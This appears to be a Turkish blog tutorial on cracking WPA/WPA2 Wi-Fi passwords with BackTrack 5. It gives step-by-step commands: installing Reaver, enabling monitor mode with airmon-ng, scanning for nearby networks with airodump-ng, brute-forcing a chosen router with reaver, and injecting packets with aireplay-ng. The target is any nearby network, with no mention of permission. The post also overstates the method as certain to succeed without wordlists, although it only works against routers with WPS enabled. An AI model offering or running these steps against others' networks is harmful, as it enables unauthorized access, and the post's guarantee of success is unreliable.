12.3.13

WPA / WPA2 Wi-Fi Şifre Kırma

Bu yazıda wordlistlere gerek kalmadan iki ile on saat içerisinde kesin sonuç veren bir yöntemle nasıl WPA / WPA2 şifresi kırılır sizlerle paylaşacağım.

Öncelikli olarak gerekli olan şeyleri ben size yazayım.

  • BACKTRACK 5 LIVE DVD
  • 1 adet boş DVD
  • DVD ve Wireless olan bir bilgisayar
  • Yakınlarda olup (ne kadar yakın o kadar iyi) WPA veya WPA2 ile şifrelenmiş bir ağ.

Önce "Backtrack 5" Linux işletim sistemimizi buradan indiriyoruz. Daha sonra bunu DVDye yazıyoruz. Taktıktan sonra bilgisayarımızı yeniden başlatıp DVDden boot yapıyoruz.

ADIM 1. BACKTRACK'i Açma

Boot işleminin ardından karşımıza yandaki gibi bir ekran gelicek. En üstteki "Default Boot Text Mode" seçerek devam edelim.









Devamında yandaki görüntüye geldiğimizde konsola "startx" yazıyoruz. Bu noktadan sonra Backtrak açılmış olarak karşımıza gelicek.











ADIM 2. Reaver Kurma Ve Update Etme

Önce kendi ağımıza bağlanmamız gerekli.
Applications > Internet > Wicd Network Manager

Artık internete bağlıyız. Önce update yapalım.
Applications > Accessories > Terminal

Açılan pencereye aşağıdaki kodu yazın entera basalım.
"apt-get update"


Reaver'ı kurmak için.
"apt-get install reaver"

Herşey doğru olduysa artık internetten çıkıp artık hedefimize yönelebiliriz.

ADIM 3. Kırma Öncesi Hazırlık

Tekrar farklı bir terminal açıp buraya
"airmon-ng start wlan0"
 yazalım. Bu noktadan sonra wireless kartımız monitör moduna geçmiş olucak.







Aynı terminale
"airodump-ng wlan0"
yazıyoruz. Bu işlemle etrafımızda ne kadar ağ varsa hepsi hakkında bilgi toplamaya başlıyor.
Eğer kırmak istediğimiz ağı listede gördüysek Ctrl+C ye basıp işlemi durduralım.



Artık kırmak istediğimiz ağın adı (ESSID), MAC adresi (BSSID) elimizde artık Reaver ile kırma işlemine başlayabiliriz.

ADIM 4. Reaver

Yeni bir Terminal daha açalım ve
 "reaver -i mon0 -b (BSSID) -vv"
yazıp entera basalım. Bu noktadan sonrası beklemek. Kırmak istediğimiz ağa ne kadar yakın olursak o kadar hızlı olur.

Hızlandırmak için başka bir terminalde

"aireplay-ng -9 -e (ESSID) -a (BSSID)  mon0"
veya
"aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (kendi MAC adresimiz) mon0"

komutlarını kullandım.

Ve mutlu son...





















Hiç yorum yok:

Yorum Gönder